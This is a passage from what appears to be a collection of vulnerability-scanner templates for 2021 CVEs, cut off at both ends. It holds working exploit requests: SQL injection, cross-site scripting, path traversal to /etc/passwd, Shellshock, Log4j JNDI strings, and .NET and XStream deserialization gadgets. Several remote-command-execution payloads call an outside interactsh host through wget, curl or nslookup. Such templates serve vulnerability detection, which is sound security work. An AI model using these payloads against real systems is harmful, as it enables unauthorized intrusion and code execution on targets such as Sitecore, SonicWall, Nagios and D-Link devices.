/views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32305","info":{"name":"Websvn <2.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-40978","info":{"name":"MKdocs 1.2.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24316","info":{"name":"WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(/{{randstr}}/)</script>","Sorry, no posts matched your criteria."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20031","info":{"name":"SonicWall SonicOS 7.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{randstr}}.tld\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["https://{{randstr}}.tld/auth.html","Please be patient as you are being re-directed"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34429","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /%u002e/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /.%00/WEB-INF/web.xml HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25085","info":{"name":"WOOF WordPress plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"additional_fields\":[\"<img src=x onerror=alert(document.domain)>\"]}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42237","info":{"name":"Sitecore Experience Platform Pre-Auth RCE","severity":"critical"},"requests":[{"raw":["POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" ?>\n<a>\n    <query></query>\n    <source>foo</source>\n    <parameters>\n        <parameter name=\"\">\n            <ArrayOfstring z:Id=\"1\" z:Type=\"System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\n                xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"\n                xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"\n                xmlns:x=\"http://www.w3.org/2001/XMLSchema\"\n                xmlns:z=\"http://schemas.microsoft.com/2003/10/Serialization/\">\n                <Count z:Id=\"2\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Count>\n                <Comparer z:Id=\"3\" z:Type=\"System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"0\"\n                    xmlns=\"\">\n                    <_comparison z:Id=\"4\" z:FactoryType=\"a:DelegateSerializationHolder\" z:Type=\"System.DelegateSerializationHolder\" z:Assembly=\"0\"\n                        xmlns=\"http://schemas.datacontract.org/2004/07/System.Collections.Generic\"\n                        xmlns:a=\"http://schemas.datacontract.org/2004/07/System\">\n                        <Delegate z:Id=\"5\" z:Type=\"System.DelegateSerializationHolder+DelegateEntry\" z:Assembly=\"0\"\n                            xmlns=\"\">\n                            <a:assembly z:Id=\"6\">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>\n                            <a:delegateEntry z:Id=\"7\">\n                                <a:assembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:delegateEntry i:nil=\"true\"/>\n                                <a:methodName z:Id=\"8\">Compare</a:methodName>\n                                <a:target i:nil=\"true\"/>\n                                <a:targetTypeAssembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:targetTypeName z:Id=\"9\">System.String</a:targetTypeName>\n                                <a:type z:Id=\"10\">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                            </a:delegateEntry>\n                            <a:methodName z:Id=\"11\">Start</a:methodName>\n                            <a:target i:nil=\"true\"/>\n                            <a:targetTypeAssembly z:Id=\"12\">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>\n                            <a:targetTypeName z:Id=\"13\">System.Diagnostics.Process</a:targetTypeName>\n                            <a:type z:Id=\"14\">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                        </Delegate>\n                        <method0 z:Id=\"15\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"11\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"12\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"13\" i:nil=\"true\"/>\n                            <Signature z:Id=\"16\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"17\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"18\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method0>\n                        <method1 z:Id=\"19\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"8\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"6\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"9\" i:nil=\"true\"/>\n                            <Signature z:Id=\"20\" z:Type=\"System.String\" z:Assembly=\"0\">Int32 Compare(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"21\" z:Type=\"System.String\" z:Assembly=\"0\">System.Int32 Compare(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"22\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method1>\n                    </_comparison>\n                </Comparer>\n                <Version z:Id=\"23\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Version>\n                <Items z:Id=\"24\" z:Type=\"System.String[]\" z:Assembly=\"0\" z:Size=\"2\"\n                    xmlns=\"\">\n                    <string z:Id=\"25\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">/c nslookup {{interactsh-url}}</string>\n                    <string z:Id=\"26\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">cmd</string>\n                </Items>\n            </ArrayOfstring>\n        </parameter>\n    </parameters>\n</a>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["System.ArgumentNullException"]}]}]},{"id":"CVE-2021-25297","info":{"name":"Nagios 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=switch&ip_address=127.0.0.1%22%3b%20wget%20{{interactsh-url}}%3b&snmpopts%5bsnmpcommunity%5d=public&scaninterfaces=on HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["<b>Ping</b>","Switch Details"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-45046","info":{"name":"Apache Log4j2 - Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\nAccept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":null},{"type":"regex","group":2,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]},{"type":"regex","group":1,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-24358","info":{"name":"Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-20038","info":{"name":"SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat(\"A\", 518)}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"prefix_addr":["%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf"],"system_addr":["%08%b7%06%08","%64%b8%06%08"]},"attack":"clusterbomb","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-21351","info":{"name":"XStream <1.4.16 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>\n      <m__DTMXRTreeFrag>\n        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>\n          <m__size>-10086</m__size>\n          <m__mgrDefault>\n            <__overrideDefaultParser>false</__overrideDefaultParser>\n            <m__incremental>false</m__incremental>\n            <m__source__location>false</m__source__location>\n            <m__dtms>\n              <null/>\n            </m__dtms>\n            <m__defaultHandler/>\n          </m__mgrDefault>\n          <m__shouldStripWS>false</m__shouldStripWS>\n          <m__indexing>false</m__indexing>\n          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>\n            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\n              <javax.sql.rowset.BaseRowSet>\n                <default>\n                  <concurrency>1008</concurrency>\n                  <escapeProcessing>true</escapeProcessing>\n                  <fetchDir>1000</fetchDir>\n                  <fetchSize>0</fetchSize>\n                  <isolation>2</isolation>\n                  <maxFieldSize>0</maxFieldSize>\n                  <maxRows>0</maxRows>\n                  <queryTimeout>0</queryTimeout>\n                  <readOnly>true</readOnly>\n                  <rowSetType>1004</rowSetType>\n                  <showDeleted>false</showDeleted>\n                  <dataSource>rmi://{{interactsh-url}}/test</dataSource>\n                  <listeners/>\n                  <params/>\n                </default>\n              </javax.sql.rowset.BaseRowSet>\n              <com.sun.rowset.JdbcRowSetImpl>\n                <default/>\n              </com.sun.rowset.JdbcRowSetImpl>\n            </fPullParserConfig>\n            <fConfigSetInput>\n              <class>com.sun.rowset.JdbcRowSetImpl</class>\n              <name>setAutoCommit</name>\n              <parameter-types>\n                <class>boolean</class>\n              </parameter-types>\n            </fConfigSetInput>\n            <fConfigParse reference='../fConfigSetInput'/>\n            <fParseInProgress>false</fParseInProgress>\n          </m__incrementalSAXSource>\n          <m__walker>\n            <nextIsRaw>false</nextIsRaw>\n          </m__walker>\n          <m__endDocumentOccured>false</m__endDocumentOccured>\n          <m__idAttributes/>\n          <m__textPendingStart>-1</m__textPendingStart>\n          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>\n          <m__pastFirstElement>false</m__pastFirstElement>\n        </m__dtm>\n        <m__dtmIdentity>1</m__dtmIdentity>\n      </m__DTMXRTreeFrag>\n      <m__dtmRoot>1</m__dtmRoot>\n      <m__allowRelease>false</m__allowRelease>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-46068","info":{"name":"Vehicle Service Management System - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin\n","GET /admin/?page=user HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"Administrator\\\"><script>alert(document.domain)</script> Admin\")"],"condition":"and"}]}]},{"id":"CVE-2021-37833","info":{"name":"Hotel Druid 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1","{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1","{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1","{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20124","info":{"name":"Draytek VigorConnect 6.0-B3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd","{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3577","info":{"name":"Motorola Baby Monitors - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["set_city_timezone"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26086","info":{"name":"Atlassian Jira Limited -  Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42071","info":{"name":"Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/slogin/login.py HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24442","info":{"name":"Wordpress Polls Widget < 1.5.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Forwarded-For: {{randstr}}\n\nquestion_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains_all(body, \"{\\\"answer_name\", \"vote\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2021-24278","info":{"name":"WordPress Contact Form 7 <2.3.4 - Arbitrary Nonce Generation","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=wpcf7r_get_nonce&param=wp_rest","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"success\":true","\"nonce\":\"[a-f0-9]+\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["\"nonce\":\"[a-f0-9]+\""],"part":"body"}]}]},{"id":"CVE-2021-31682","info":{"name":"WebCTRL OEM <= 6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","common/lvl5"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46379","info":{"name":"D-Link DIR850 ET850-1.08TRb03 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-41293","info":{"name":"ECOA Building Automation System - Arbitrary File Retrieval","severity":"high"},"requests":[{"raw":["POST /viewlog.jsp HTTP/1.1\nHost: {{Hostname}}\n\nyr=2021&mh=6&fname=../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45382","info":{"name":"D-Link - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/ddns_check.ccp"],"body":"ccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername={{string1}}&ddnsPassword={{string2}}","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-4191","info":{"name":"GitLab GraphQL API User Enumeration","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: */*\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/-/graphql-explorer\n\n{\"query\":\"# Welcome to GraphiQL\\n#\\n# GraphiQL is an in-browser tool for writing, validating, and\\n# testing GraphQL queries.\\n#\\n# Type queries into this side of the screen, and you will see intelligent\\n# typeaheads aware of the current GraphQL type schema and live syntax and\\n# validation errors highlighted within the text.\\n#\\n# GraphQL queries typically start with a \\\"{\\\" character. Lines that starts\\n# with a # are ignored.\\n#\\n# An example GraphQL query might look like:\\n#\\n#     {\\n#       field(arg: \\\"value\\\") {\\n#         subField\\n#       }\\n#     }\\n#\\n# Keyboard shortcuts:\\n#\\n#  Prettify Query:  Shift-Ctrl-P (or press the prettify button above)\\n#\\n#       Run Query:  Ctrl-Enter (or press the play button above)\\n#\\n#   Auto Complete:  Ctrl-Space (or just start typing)\\n#\\n\\n{\\n  users {\\n    nodes {\\n      id\\n      name\\n      username\\n    }\\n  }\\n}\",\"variables\":null,\"operationName\":null}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"data\"","\"users\"","\"nodes\"","\"id\"","gid://"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.nodes[].username"]}]}]},{"id":"CVE-2021-33690","info":{"name":"SAP NetWeaver Development Infrastructure - Server Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /tc.CBS.Appl/tcspseudo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCBS=http://{{interactsh-url}}&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Could not connect to the CBS"]}]}]},{"id":"CVE-2021-21311","info":{"name":"Adminer <4.7.9 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}\n"],"payloads":{"path":["/index.php","/adminer.php","/adminer/adminer.php","/adminer/index.php","/_adminer.php","/_adminer/index.php"]},"attack":"batteringram","stop-at-first-match":true,"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>400 - Bad Request</title>","&lt;title&gt;400 - Bad Request&lt;/title&gt;"],"condition":"or"},{"type":"status","status":[403]}]}]},{"id":"CVE-2021-3377","info":{"name":"npm ansi_up v4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["sh\"/onmouseover=\"alert(1)\">"]}]}]},{"id":"CVE-2021-40822","info":{"name":"Geoserver - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /geoserver/TestWfsPost HTTP/1.1\nHost: oast.pro\nContent-Type: application/x-www-form-urlencoded\n\nform_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<b>Interactsh</b>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45428","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n","PUT /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\nCVE-2021-45428\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_2 == 201","contains(body_3, \"CVE-2021-45428\") 